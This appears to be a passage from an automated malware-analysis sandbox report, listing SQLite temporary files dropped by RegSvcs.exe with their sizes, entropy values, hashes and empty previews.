                                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp4D48.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):40960
                                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp4D49.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):40960
                                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp4D59.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):106496
                                                                                                                                              Entropy (8bit):1.1358696453229276
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp4D6A.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):106496
                                                                                                                                              Entropy (8bit):1.1358696453229276
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp4D7B.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):106496
                                                                                                                                              Entropy (8bit):1.1358696453229276
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp5C77.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):98304
                                                                                                                                              Entropy (8bit):0.08235737944063153
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp843B.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):106496
                                                                                                                                              Entropy (8bit):1.1358696453229276
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp844C.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):106496
                                                                                                                                              Entropy (8bit):1.1358696453229276
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp845D.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):106496
                                                                                                                                              Entropy (8bit):1.1358696453229276
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp846D.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):106496
                                                                                                                                              Entropy (8bit):1.1358696453229276
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp847E.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):106496
                                                                                                                                              Entropy (8bit):1.1358696453229276
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp848E.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):106496
                                                                                                                                              Entropy (8bit):1.1358696453229276
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp848F.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):106496
                                                                                                                                              Entropy (8bit):1.1358696453229276
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp84BF.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):106496
                                                                                                                                              Entropy (8bit):1.1358696453229276
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpBB13.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):106496
                                                                                                                                              Entropy (8bit):1.1358696453229276
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpBB23.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):49152
                                                                                                                                              Entropy (8bit):0.8180424350137764
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpBB43.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):49152
                                                                                                                                              Entropy (8bit):0.8180424350137764
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpBB44.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):49152
                                                                                                                                              Entropy (8bit):0.8180424350137764
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpBB45.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):49152
                                                                                                                                              Entropy (8bit):0.8180424350137764
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpBB66.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):49152
                                                                                                                                              Entropy (8bit):0.8180424350137764
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpBB67.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):49152
                                                                                                                                              Entropy (8bit):0.8180424350137764
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpF13D.tmp

                                                                                                                                              Download File
